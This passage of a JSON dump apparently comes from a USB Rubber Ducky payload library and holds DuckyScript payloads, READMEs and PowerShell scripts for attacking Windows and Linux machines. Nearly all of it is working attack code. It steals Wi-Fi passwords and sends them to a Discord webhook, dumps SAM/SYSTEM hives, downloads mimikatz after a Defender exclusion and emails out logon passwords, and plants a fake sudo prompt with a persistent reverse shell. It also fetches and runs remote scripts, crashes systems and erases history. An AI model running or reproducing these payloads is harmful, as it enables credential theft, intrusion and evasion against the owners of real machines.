Found\" }\r\n\r\n # Create a custom object with the profile and password information\r\n $wifiData += [PSCustomObject]@{\r\n Username = $env:username\r\n Profile = $wlan\r\n Password = $password\r\n }\r\n}\r\n\r\n# Convert the array of Wi-Fi data to JSON\r\n$jsonBody = $wifiData | ConvertTo-Json -Depth 3\r\n\r\n# Save the JSON data to a file on the USB drive\r\n$jsonBody | Out-File -FilePath $usbPath -Encoding UTF8\r\n\r\n\r\n\r\n# Clear the PowerShell command history\r\nClear-History\r\n\r\nexit\r\n" }, { "path": "payloads/library/credentials/Local_WLAN_Borrower/README.md", "content": "### Local_WLAN_Borrower\nThis script borrows the wifi passwords on the target system and puts them into a .txt file on the ducky.\n\n# Setup\nFirstly, download and place the _1.ps1_ script onto the root of your ducky. Then, you will need to edit the inject.txt file accordingly:\nOn line 57, change \"DUCKY\" to the label of your USB. On line 59, change 1.ps1 to the name of the PS1 script on your ducky. \nInside of the PS1 script, you will need to replace _DUCKY_ on line 2 with the label of your USB. \n" }, { "path": "payloads/library/credentials/Local_WLAN_Borrower/payload.txt", "content": "REM Title: Local_WLAN_Borrower\nREM Description: Borrows wifi passwords and saves them on the DUCKY\nREM Author: YEETBOY0330\nREM Props: Zero_Sploit(DUCKY-WIFI-GRABBER) + Hak5 Team\nREM Version: 1.0\nREM Category: Creds\nREM Target: Windows 10 & 11\nREM Attackmodes: HID, STORAGE\n\nATTACKMODE HID STORAGE\nDEFAULTDELAY 20\n\nEXTENSION PASSIVE_WINDOWS_DETECT\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n Windows fully passive OS Detection and passive Detect Ready\n Includes its own passive detect ready.\n Does not require additional extensions.\n\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n $_OS will be set to WINDOWS or NOT_WINDOWS\n See end of payload for usage within payload\n END_REM\n\n REM CONFIGURATION:\n DEFINE #MAX_WAIT 150\n DEFINE #CHECK_INTERVAL 20\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\n DEFINE #NOT_WINDOWS 7\n\n $_OS = #NOT_WINDOWS\n\n VAR $MAX_TRIES = #MAX_WAIT\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\n DELAY #CHECK_INTERVAL\n $MAX_TRIES = ($MAX_TRIES - 1)\n END_WHILE\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\n $_OS = WINDOWS\n END_IF\n\n REM_BLOCK EXAMPLE USAGE AFTER EXTENSION\n IF ($_OS == WINDOWS) THEN\n STRING HELLO WINDOWS!\n ELSE\n STRING HELLO WORLD!\n END_IF\n END_REM\nEND_EXTENSION\n\nREM change this to your drive label\nDEFINE #DRIVE_LABEL DUCKY\nREM change this to the name of your PS1 script\nDEFINE #PS1_FILE_NAME 1.ps1\nIF ($_OS == WINDOWS) THEN\n REM Initial Delay\n DELAY 1000\n REM Opens powershell with script execution enabled\n GUI r\n DELAY 700\n STRINGLN powershell -ExecutionPolicy Bypass\n DELAY 4000\n\n REM Gets usb drive letter of #DRIVE_LABEL\n STRINGLN_POWERSHELL\n $targetLabel = \"#DRIVE_LABEL\"\n $volume = Get-Volume | Where-Object { $_.FileSystemLabel -eq $targetLabel }\n $driveLetter = $volume.DriveLetter + \":\"\n cd $driveletter\n END_STRINGLN\n REM Runs powershell script\n STRINGLN .\\#PS1_FILE_NAME\n\nEND_IF\n" }, { "path": "payloads/library/credentials/SamDumpDucky/README.md", "content": "**Title: SamDumpDucky**\n\n

Author: 0i41E
\nOS: Windows
\nVersion: 2.0
\n\n**What is SamDumpDucky?**\n#\n

SamDumpDucky dumps the users sam and system hive and exfiltrate them onto the Ducky.
\nAfterwards you can use a tool like pypykatz to extract the users hashes.

\n\n\n**Instruction:**\n1. Change the language within the extension \"Windows_Elevated_Execution\" to your model, default was set to german.\n\n2. Compile the payload using PayloadStudio and place it onto your Ducky.\n\n3. Plug in your RubberDucky and wait for the process to end, this may take a while due to the Duckys slow transfer speed.\n\n4. Use a tool like samdump2 or pypykatz on your machine to extract the users hashes.\n\t> `samdump2 DuckySys DuckySam`\n\tor `pypykatz registry DuckySys --sam DuckySam`\n\t\n\t**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**\n\n![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)\n" }, { "path": "payloads/library/credentials/SamDumpDucky/payload.txt", "content": "REM Title: SamDumpDucky\nREM Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like pypykatz, to get the users hashes.\nREM Author: 0i41E\nREM Version: 2.0\nREM Category: Credentials\nREM Attackmodes: HID, Storage\n\nATTACKMODE HID STORAGE\n\nREM Extension made by Korben to increase speed\nEXTENSION DETECT_READY\n REM VERSION 1.1\n REM AUTHOR: Korben\n\n REM_BLOCK DOCUMENTATION\n USAGE:\n Extension runs inline (here)\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\n boot delay\n\n TARGETS:\n Any system that reflects CAPSLOCK will detect minimum required delay\n Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms\n END_REM\n\n REM CONFIGURATION:\n DEFINE #RESPONSE_DELAY 25\n DEFINE #ITERATION_LIMIT 120\n\n VAR $C = 0\n WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))\n CAPSLOCK\n DELAY #RESPONSE_DELAY\n $C = ($C + 1)\n END_WHILE\n CAPSLOCK\nEND_EXTENSION\n\nREM Extension made by 0i41E to automate elevated execution of powershell - Change language layout within here\nEXTENSION WINDOWS_ELEVATED_EXECUTION\n REM VERSION 1.1\n REM Author: 0i41E\n REM Executes the desired program with elevated privileges\n REM Conformation via keyboard shortcut for (currently) english, german and spanish layouts\n REM additional extensions\n\n REM CONFIGURATION:\n REM Used to wait for the UAC prompt to react to input\n DEFINE #INPUT_WAIT 2000\n REM Shortcut for YES across multiple languages\n DEFINE #ENGLISH_ACCEPT ALT y\n DEFINE #GERMAN_ACCEPT ALT j\n DEFINE #SPAIN_ACCEPT ALT s\n \n FUNCTION Elevated_Execution()\n DELAY #INPUT_WAIT \n CTRL-SHIFT ENTER\n DELAY #INPUT_WAIT\n REM Change below for appropriate language\n #GERMAN_ACCEPT\n DELAY #INPUT_WAIT\n END_FUNCTION\n\n REM EXAMPLE USAGE AFTER EXTENSION\n REM DELAY 2000\n REM GUI r\n REM DELAY 2000\n REM STRING powershell\n REM Elevated_Execution()\n REM STRINGLN whoami /priv\n\nEND_EXTENSION\n\nREM Extension by 0i41E, to signalize the successful execution of the payload\nEXTENSION DETECT_FINISHED\n REM VERSION 1.0\n REM AUTHOR: 0i41E\n\n REM_BLOCK DOCUMENTATION\n USAGE:\n Use the function Detect_Finished() to signal the finished execution of your payload.\n END_REM\n\n REM CONFIGURATION:\n DEFINE #PAUSE 150\n FUNCTION Detect_Finished()\n IF ($_CAPSLOCK_ON == FALSE)\n CAPSLOCK\n DELAY #PAUSE\n CAPSLOCK\n DELAY #PAUSE\n CAPSLOCK\n DELAY #PAUSE\n CAPSLOCK\n ATTACKMODE OFF\n ELSE IF\n CAPSLOCK\n DELAY #PAUSE\n CAPSLOCK\n DELAY #PAUSE\n CAPSLOCK\n ATTACKMODE OFF\n END_IF\n END_FUNCTION\nEND_EXTENSION\n\nDELAY 1000\nGUI r\nDELAY 500\nSTRING powershell -nop -noni\nREM Opening elevated powershell via extension\nElevated_Execution()\nSTRINGLN cd (gwmi win32_volume -f 'label=''DUCKY''').Name\nDELAY 350\nREM Dumping Sam&System and saving them onto the ducky. This may take some time, potentially over 2 minutes\nSTRING Write-Host \"[+]Exfiltrating Sam&System...\" -ForegroundColor Green;reg save hklm\\sam DuckySam;Write-Host \"[?]This may take a while...\" -ForegroundColor Yellow;reg save hklm\\system DuckySys;Write-Host \"[+]Exfiltration Complete!\" -ForegroundColor Green\nSTRINGLN ;(New-Object -comObject Shell.Application).Namespace(17).ParseName((gwmi win32_volume -f 'label=''DUCKY''').Name).InvokeVerb('Eject');(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');ExIt\nDELAY 250\nREM Waiting for CAPSLOCK, pressed by Powershell, to proceed with the finishing lines.\nWAIT_FOR_CAPS_ON\nDELAY 250\nDetect_Finished()\n" }, { "path": "payloads/library/credentials/Simple_User_Password_Grabber/payload.txt", "content": "REM Title: windows password grabber\nREM Arthor makozort, https://github.com/makozort\nREM Target: windows 10 (with admin access), might work with windows 7 idk\nREM THIS IS FOR AUTHORISED USE ON MACHINES YOU EITHER OWN OR HAVE BEEN GIVEN ACCESS TO PEN TEST, MAKOZORT IS NOT LIABLE FOR ANY MISUSE OF THIS SCRIPT\nREM --------------set default delay based on targets computer speed, 350 is around mid range (I think)\nDEFAULT_DELAY 350\nREM -------------first delay is 1 second (you may need more) to let windows set up the \"keyboard\"\nDELAY 1000\nREM ------------open powershell as admin and set an exclusion path in the C:\\Users path\nGUI r\nSTRING powershell\nCTRL-SHIFT ENTER\nDELAY 600\nALT y\nSTRING Set-MpPreference -ExclusionPath C:\\Users\nENTER\nSTRING exit\nENTER\nREM -------------download mimikatz\nGUI r\nSTRING cmd\nCTRL-SHIFT ENTER\nDELAY 600\nALT y\nSTRING powershell (new-object System.Net.WebClient).DownloadFile('LINK TO MIMIKATZ.EXE DOWNLOAD HERE','%temp%\\pw.exe')\nENTER\nREM ------------run the following mimikatz commands and print results in new txt file\nDELAY 4000\nSTRING %TEMP%\\pw.exe > c:\\pwlog.txt & type pwlog.txt;\nENTER \nSTRING privilege::debug\nENTER\nSTRING sekurlsa::logonPasswords full\nENTER\nSTRING exit\nENTER\nREM< --------- delete mimikatz\nSTRING del %TEMP%\\pw.exe\nENTER\nSTRING exit\nENTER\nREM -------------email the pwlog.txt to your email\nGUI r\nSTRING powershell\nCTRL-SHIFT ENTER\nDELAY 600\nALT y\nSTRING Remove-MpPreference -ExclusionPath C:\\Users\nENTER\nSTRING $SMTPServer = 'smtp.gmail.com'\nENTER\nSTRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)\nENTER\nSTRING $SMTPInfo.EnableSsl = $true\nENTER\nSTRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@\nSHIFT 2\nSTRING gmail.com', 'PASSWORDHERE');\nENTER\nSTRING $ReportEmail = New-Object System.Net.Mail.MailMessage\nENTER\nSTRING $ReportEmail.From = 'THE-PART-OF-YOUR-EMAIL-BEFORE-THE-@\nSHIFT 2\nSTRING gmail.com'\nENTER\nSTRING $ReportEmail.To.Add('THE-PART-OF-RECEIVERS-EMAIL-BEFORE-THE-@\nSHIFT 2\nSTRING gmail.com')\nENTER\nSTRING $ReportEmail.Subject = 'Hello from the ducky'\nENTER\nSTRING $ReportEmail.Body = 'Attached is your duck report.' \nENTER\nSTRING $ReportEmail.Attachments.Add('c:\\pwlog.txt')\nENTER\nSTRING $SMTPInfo.Send($ReportEmail)\nENTER\nDELAY 4000\nSTRING exit\nENTER\nREM ------cleanup time\nGUI r\nSTRING powershell\nCTRL-SHIFT ENTER\nDELAY 600\nALT y\nREM ----------delete the txt file\nSTRING del c:\\pwlog.txt\nENTER\nREM -------remove powershell history (this probably wont be enough to remove all traces of you, this is just to prevent inital investigations\nSTRING Remove-Item (Get-PSreadlineOption).HistorySavePath\nENTER\nSTRING exit\nENTER\nREM ------lock the pc\nGUI l\n" }, { "path": "payloads/library/credentials/WLAN-Windows-Passwords/README.md", "content": "# WLAN Windows Password\n\nA script used to stole target WLAN Passwords.\n\n**Category**: Credentials\n\n## Description\n\nA script used to stole target WLAN Passwords.\n\nOpens PowerShell hidden, grabs wlan passwords, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.\n\nThen it cleans up traces of what you have done after.\n\n## Getting Started\n\n### Dependencies\n\n* An internet connection\n* Windows 10,11\n\n### Executing program\n\n* Plug in your device\n* Invoke 2 netsh commands\n* Invoke-WebRequest will be entered in the Run Box to send the content\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
" }, { "path": "payloads/library/credentials/WLAN-Windows-Passwords/Windows-Passwords.ps1", "content": "\n# ENG\nnetsh wlan show profile | Select-String '(?<=All User Profile\\s+:\\s).+' | ForEach-Object {\n $wlan = $_.Matches.Value\n $passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\\s+:\\s).+'\n\n\t$Body = @{\n\t\t'username' = $env:username + \" | \" + [string]$wlan\n\t\t'content' = [string]$passw\n\t}\n\t\n\tInvoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)\n}\n\n# Clear the PowerShell command history\nClear-History\n" }, { "path": "payloads/library/credentials/WLAN-Windows-Passwords/payload.txt", "content": "REM ###################################################################\nREM # |\nREM # Title : WLAN-Windows-Passwords-Discord-Exfiltration |\nREM # Author : Aleff |\nREM # Description: A script used to stole target WLAN Passwords. |\nREM # Category : Credentials |\nREM # Target : Windows 10-11 |\nREM # Version : 1.0 |\nREM # |\nREM ###################################################################\n\n\n\nDELAY 2000\nGUI r\nDELAY 250\nSTRING powershell -w h -ep bypass $discord='\n\nREM REQUIRED - Provide Discord Webhook - https://discordapp.com/api/webhooks//\nDEFINE DISCORD example.com\nSTRING DISCORD\n\nREM Reply example.com with YOUR LINK. The Payload should be Windows-Passwords.ps1\nDEFINE PAYLOAD example.com\nSTRINGLN ';irm PAYLOAD | iex\n" }, { "path": "payloads/library/credentials/WindowsLicenseKeyExfiltration/WindowsLicenseKeyExfiltration.txt", "content": "REM WindowsLicenseKeyExfiltration\r\nREM Version 1.0\r\nREM OS: Windows\r\nREM Author: 0i41E\r\nREM Requirement: DuckyScript 3.0\r\nREM This small powershell payload dumps the Windows license key, which can be either saved within the Bios and/or in the registry.\r\n\r\nREM Extension made by Korben for checking if Target is Windows OS\r\nEXTENSION EXTENSION PASSIVE_WINDOWS_DETECT\r\n REM VERSION 1.1\r\n REM AUTHOR: Korben\r\n\r\n REM_BLOCK DOCUMENTATION\r\n Windows fully passive OS Detection and passive Detect Ready\r\n Includes its own passive detect ready.\r\n Does not require additional extensions.\r\n\r\n USAGE:\r\n Extension runs inline (here)\r\n Place at beginning of payload (besides ATTACKMODE) to act as dynamic\r\n boot delay\r\n $_OS will be set to WINDOWS or NOT_WINDOWS\r\n See end of payload for usage within payload\r\n END_REM\r\n\r\n REM CONFIGURATION:\r\n DEFINE #MAX_WAIT 150\r\n DEFINE #CHECK_INTERVAL 20\r\n DEFINE #WINDOWS_HOST_REQUEST_COUNT 2\r\n DEFINE #NOT_WINDOWS 7\r\n\r\n $_OS = #NOT_WINDOWS\r\n\r\n VAR $MAX_TRIES = #MAX_WAIT\r\n WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))\r\n DELAY #CHECK_INTERVAL\r\n $MAX_TRIES = ($MAX_TRIES - 1)\r\n END_WHILE\r\n IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN\r\n $_OS = WINDOWS\r\n END_IF\r\n\r\n REM_BLOCK EXAMPLE USAGE AFTER EXTENSION\r\n IF ($_OS == WINDOWS) THEN\r\n STRING HELLO WINDOWS!\r\n ELSE\r\n STRING HELLO WORLD!\r\n END_IF\r\n END_REM\r\nEND_EXTENSION\r\n\r\nREM Extension made by 0i41E to signalize the payloads end\r\nEXTENSION DETECT_FINISHED\r\n REM VERSION 1.0\r\n REM AUTHOR: 0i41E\r\n\r\n REM_BLOCK DOCUMENTATION\r\n USAGE:\r\n Use the function Detect_Finished() to signal the finished execution of your payload.\r\n END_REM\r\n\r\n REM CONFIGURATION:\r\n DEFINE #PAUSE 150\r\n FUNCTION Detect_Finished()\r\n IF ($_CAPSLOCK_ON == FALSE)\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n ATTACKMODE OFF\r\n ELSE IF\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n DELAY #PAUSE\r\n CAPSLOCK\r\n ATTACKMODE OFF\r\n END_IF\r\n END_FUNCTION\r\nEND_EXTENSION\r\n\r\nREM Extension made by 0i41E for fileless exfiltration via Lock Keys\r\nEXTENSION WINDOWS_FILELESS_HID_EXFIL\r\n REM VERSION 1.0\r\n REM AUTHOR: 0i41E\r\n\r\n REM_BLOCK DOCUMENTATION\r\n Extension for Keystroke Reflection data exfiltration without putting files on disk.\r\n This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5s original Method.\r\n\r\n TARGET:\r\n Windows Hosts that supports powershell and SendKeys\r\n\r\n USAGE:\r\n Type out your command or script with powershell, don't execute it yet (so just type it out with STRING), afterwards you put the function Windows_Fileless_HID_Exfil() behind it.\r\n It'll take the commands/scritps output and writes it into a variable, which then gets exfiltrated.\r\n\r\n Example Usage:\r\n GUI r\r\n DELAY 500\r\n STRINGLN powershell\r\n DELAY 1000\r\n STRING echo \"This is my test\"\r\n Windows_Fileless_HID_Exfil()\r\n END_REM\r\n\r\n FUNCTION Windows_Fileless_HID_Exfil()\r\n DELAY 250\r\n REM Saving current Keyboard lock keys\r\n SAVE_HOST_KEYBOARD_LOCK_STATE\r\n $_EXFIL_MODE_ENABLED = TRUE\r\n $_EXFIL_LEDS_ENABLED = TRUE\r\n DELAY 500\r\n REM Setting the output as variable\r\n STRING |Out-String|Set-Variable -Name \"DD\";\r\n REM Converting output into Lock Key values\r\n STRING $BL = $DD.ToCharArray();$c = \"\";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';\r\n REM Exfiltrating via Keystroke Reflection\r\n STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit\r\n REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.\r\n WAIT_FOR_SCROLL_CHANGE\r\n LED_G\r\n $_EXFIL_MODE_ENABLED = FALSE\r\n RESTORE_HOST_KEYBOARD_LOCK_STATE\r\n END_FUNCTION\r\nEND_EXTENSION\r\n\r\nREM If set to TRUE, keys will be send via PowerShells Invoke-Restmethod\r\nDEFINE #REMOTE_EXFIL FALSE\r\nREM Define the remote host to which the keys shall be send to. (Only when REMOTE_EXFIL is set to TRUE!)\r\nDEFINE #URL https://example.com/\r\n\r\nREM If Target is Windows, execute payload\r\nIF ($_OS == WINDOWS) THEN\r\n GUI r\r\n DELAY 500\r\n STRINGLN powershell -nop -noni\r\n DELAY 1000\r\n STRINGLN Write-Host \"[+]Attempting exfiltration of Windows Product Keys...\" -ForegroundColor Green\r\n DELAY 300\r\nREM Dumping License key when saved in Bios\r\n STRING $Get_License = \"echo 'Product Key in Bios:';(Get-WmiObject -query 'select * from SoftwareLicensingService').OA3xOriginalProductKey;\r\nREM Dumping License key via registry\r\n STRING Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -name BackupProductKeyDefault | Select-Object BackupProductKeyDefault\"\r\nREM Executing Get_License\r\n STRING ;IeX $Get_License\r\n\r\nREM If REMOTE_EXFIL is set to TRUE,exfiltrate keys to remote host\r\n IF_DEFINED_TRUE #REMOTE_EXFIL\r\n DELAY 500\r\nREM Setting the output as variable & sending it to defined remote host\r\n STRINGLN |Out-String|Set-Variable -Name \"DD\";Invoke-Restmethod -UseBasicParsing -Method Post -Uri \"#URL\" -Body $DD;exit\r\n DELAY 150\r\n Detect_Finished()\r\n ELSE_DEFINED\r\nREM Exfiltrating License key via Keystroke Reflection\r\n Windows_Fileless_HID_Exfil()\r\n DELAY 150\r\n Detect_Finished()\r\n END_IF_DEFINED\r\nREM If System is not Windows...\r\nELSE\r\n ATTACKMODE STORAGE\r\nEND_IF" }, { "path": "payloads/library/credentials/WindowsLicenseKeyExfiltration/readme.md", "content": "**Title: WindowsLicenseKeyExfiltration**\r\n\r\n

Author: 0i41E
\r\nOS: Windows
\r\nVersion: 1.0
\r\n\r\n**What is WindowsLicenseKeyExfiltration?**\r\n\r\n#\r\n

This payload exfiltrates the Windows Product keys from the target system. These can be saved in the registry and/or on the BIOS itself. Sometimes they can differ.\r\n\r\nThis may be an important process for Admins or for your private use.

\r\n\r\n\r\n**Instructions:**\r\n1. By default, the keys will get exfiltrated via Keystroke Reflection, which may take a while but does not require any form of internet connection or mass stoarge to be allowed. If you set `REMOTE_EXFIL` in line 132 to `TRUE`, then you'll need to define the address of the receiving remote host, this either can be an URL of a webhook or an IP_Address of a system of your choice. Define it in line 134.\r\n\r\n2. Plug in your RubberDucky into a Windows target and wait for the process to end.\r\n\r\n_*If plugged into a non Windows system, `ATTACKMODE STORAGE` will be triggered. This way you can collect the loot savely._\r\n\r\n3. Open the exfiltrated loot.bin file to access the recovered key, or check your remote host for received messages." }, { "path": "payloads/library/credentials/datacopier/datacopier", "content": "REM Written and tested by Dante Sparda\nREM this took a lot of digging and research. please use responsibly. \nREM i wrote this on a wim but of course you can filter whatever you want to the loot folder \nREM I used some premise i found below and modified what i needed\nREM https://www.mathewjbray.com/powershell/powershell-get-drive-letters-by-volume-name-and-execute-robocopy/\n\nDELAY 1000\nGUI R \nDELAY 1000\nSTRING powershell.exe \nENTER\nDELAY 3000 \nSTRING cd C:\\Users\\$env:Username\\Pictures\\\nENTER\nSTRING get-childitem -Filter *.JPG\", *.PNG\" -path \"C:\\Users\\$env:Username\\Pictures\\\"\nENTER\nSTRING Copy-Item -path \"C:\\Users\\$env:Username\\Pictures\\\" -include \"*.JPG\", \"*.PNG\" -Destination \"C:\\Windows\\Temp\" -Force -PassThru\nENTER\nSTRING cd C:\\Windows\\Temp\nENTER\nSTRING mkdir loot\nENTER\nSTRING $destinationLabel = \"DUCKY\"\nENTER\nSTRING $destinationLetter = Get-WmiObject -Class Win32_Volume | where {$_.Label -eq $destinationLabel} | select -expand name\nENTER\nSTRING get-childitem -Filter .jpg*, .png* -path C:\\Windows\\Temp | move-item -Destination \"C:\\Windows\\Temp\\loot\"\nENTER\nSTRING move-item -path C:\\Windows\\Temp\\loot -Destination $destinationLetter\nENTER\nEND\n" }, { "path": "payloads/library/credentials/sudoSnatch/payload.txt", "content": "REM Title: sudoSnatch\nREM Description: sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally..\nREM AUTHOR: drapl0n\nREM Version: 1.0\nREM Category: Credentials\nREM Target: Unix-like operating systems with systemd\nREM Attackmodes: HID\nREM Note: Replace IP address and port number on line no. 34 with yours.\nREM Note: Use command: [nc -l -p ] to fetch captured passwords on attacking machine.\n\nREM [keeping tracks clear]\nDELAY 500\nCTRL-ALT t\nDELAY 400\nSTRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE\nENTER\nDELAY 100\n\nREM [creating password grabbing mechanism]\nSTRING mkdir /var/tmp/.system\nENTER\nDELAY 100\nSTRING echo -e \"#\\!/bin/bash\\necho -n \\\"[sudo] password for \\$(whoami):\\\"\\nIFS=\\\"\\\" read -s pass\\necho -e \\\"Timestamp=[\\$(date)] \\\\\\t User=[\\$(whoami)] \\\\\\t Password=[\\$pass]\\\" >> /var/tmp/.system/sysLog\\necho -e \\\"\\\\\\nSorry, try again.\\\"\" > /var/tmp/.system/systemMgr\nENTER\nDELAY 100\nSTRING touch /var/tmp/.system/sysLog\nENTER\nDELAY 100\nSTRING chmod +x /var/tmp/.system/systemMgr\nENTER\nDELAY 100\n\nREM [creating reverse shell]\nSTRING echo -e \"while :\\ndo\\n\\tping -c 5 0.0.0.0\\n\\tif [ $? -eq 0 ]; then\\n\\t\\tphp -r '\\$sock=fsockopen(\\\"0.0.0.0\\\",4444);exec(\"\\\"cat /var/tmp/.system/sysLog \"<&3 >&3 2>&3\"\\\"\");'\\n\\tfi\\ndone\" > /var/tmp/.system/systemBus\nENTER\nDELAY 100\nSTRING chmod +x /var/tmp/.system/systemBus\nENTER\nDELAY 100\n\nREM [creating systemd service to execute payload on boot]\nSTRING mkdir -p ~/.config/systemd/user\nENTER\nDELAY 200\nSTRING echo -e \"[Unit]\\nDescription= System BUS handler\\n\\n[Service]\\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\\nRestart=on-failure\\nSuccessExitStatus=3 4\\nRestartForceExitStatus=3 4\\n\\n[Install]\\nWantedBy=default.target\" > ~/.config/systemd/user/systemBUS.service\nENTER\nDELAY 100\n\nREM [creating reboot script incase if listner stops or targets internet connection gets lost] \nSTRING echo \"while true; do systemctl --user restart systemBUS.service; sleep 15m; done\" > /var/tmp/.system/reboot\nENTER\nDELAY 100\nSTRING chmod +x /var/tmp/.system/reboot\nENTER\nDELAY 100\n\nREM [creating systemd service for reboot]\nSTRING echo -e \"[Unit]\\nDescription= System BUS handler reboot.\\n\\n[Service]\\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\\nRestart=on-failure\\nSuccessExitStatus=3 4\\nRestartForceExitStatus=3 4\\n\\n[Install]\\nWantedBy=default.target\" > ~/.config/systemd/user/reboot.service\nENTER\nDELAY 100\n\nREM [enabling services]\nSTRING systemctl --user daemon-reload\nENTER\nDELAY 300\nSTRING systemctl --user enable --now systemBUS.service\nENTER\nDELAY 150\nSTRING systemctl --user start --now systemBUS.service\nENTER\nDELAY 150\nSTRING systemctl --user enable --now reboot.service\nENTER\nDELAY 150\nSTRING systemctl --user start --now reboot.service\nENTER\nDELAY 100\n\nREM [autostarting service on terminal/shell launch]\nSTRING echo -e \"#\\!/bin/bash\\nls -a | grep 'zshrc' &> /dev/null\\nif [ \\$? = 0 ]; then\\n\\techo -e \\\"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\\\" >> ~/.zshrc\\n\\techo \\\"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\\\" >> ~/.zshrc\\nfi\\n\\nls -a | grep 'bashrc' &> /dev/null\\nif [ \\$? = 0 ]; then\\n\\techo -e \\\"alias sudo='bash /var/tmp/.system/systemMgr && sudo'\\\" >> ~/.bashrc\\n\\techo \\\"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service && systemctl --user restart reboot.service\\\" >> ~/.bashrc\\nfi\" > ~/tmmmp\nENTER\nDELAY 100\nSTRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit\nENTER\n" }, { "path": "payloads/library/execution/$MFT-Duck-Crasher/payload.txt", "content": "REM Title: $MFT-Duck-Crasher\nREM Author: JonnyBanana\nREM A Simple Script for Rubber Ducky which Exploits Windows $MFT Vulnerability.\nREM $MFT is used by NTFS systems to manage some metadata. Works on windows 7, 8 and vista, dont work on windows 10. \nREM I think work on Xp and earlier. The system crash lasts until the machine is switched off, or until the blue screen of death appears\nREM works on w7 - w8 - Vista (and i think xp and earlier too)\nREM it uses a high delay to support even older computers\nDELAY 1000\nCONTROL ESCAPE\nDELAY 500\nSTRING C:$MFT\nDELAY 500\nENTER\nDELAY 700\nREM the 2nd enter is to close the error\nENTER\nDELAY 500\nCONTROL ESCAPE\nDELAY 500\nSTRING C:$MFT\\123\nDELAY 500\nENTER\nDELAY 700\nENTER\nDELAY 500\nCONTROL ESCAPE\nDELAY 500\nSTRING C:$MFT\nDELAY 500\nENTER\nDELAY 700\nENTER\nDELAY 500\nCONTROL ESCAPE\nDELAY 500\nSTRING C:$MFT\\123\nDELAY 500\nENTER\nDELAY 700\nENTER \n" }, { "path": "payloads/library/execution/-RD-Play-WAV/Play-WAV.ps1", "content": "############################################################################################################################################################ \n# | ___ _ _ _ # ,d88b.d88b # \n# Title : Play-WAV | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 # \n# Author : I am Jakoby | | | / _` | | '_ ` _ \\ _ | | / _` | | |/ / / _ \\ | '_ \\ | | | |# `Y8888888Y' # \n# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #\n# Category : Execution | |___| \\__,_| |_| |_| |_| \\___/ \\__,_| |_|\\_\\ \\___/ |_.__/ \\__, |# `Y' #\n# Target : Windows 10,11 | |___/ # /\\/|_ __/\\\\ # \n# Mode : HID | |\\__/,| (`\\ # / -\\ /- ~\\ # \n# Dependencies : Dropbox | My crime is that of curiosity |_ _ |.--.) )# \\ = Y =T_ = / # \n# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \\ Hobo # \n# | but satisfaction brought him back (((^_(((/(((_/ # / \\ / \\ # \n#__________________________________|_________________________________________________________________________# | | ) ~ ( #\n# # / \\ / ~ \\ #\n# github.com/I-Am-Jakoby # \\ / \\~ ~/ # \n# twitter.com/I_Am_Jakoby # /\\_/\\_/\\__ _/_/\\_/\\__~__/_/\\_/\\_/\\_/\\_/\\_# \n# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |# \n# youtube.com/c/IamJakoby # | | | |( ( | | | \\\\ | | | | | |#\n############################################################################################################################################################\n\n<#\n.NOTES\n\tThis script requires you to have a DropBox account or another file hosting service\n\n.DESCRIPTION \n\tThis program downloads a sound from your DropBox\n\tTurns the volume to max level on victims PC\n\tPauses the script until a mouse movement is 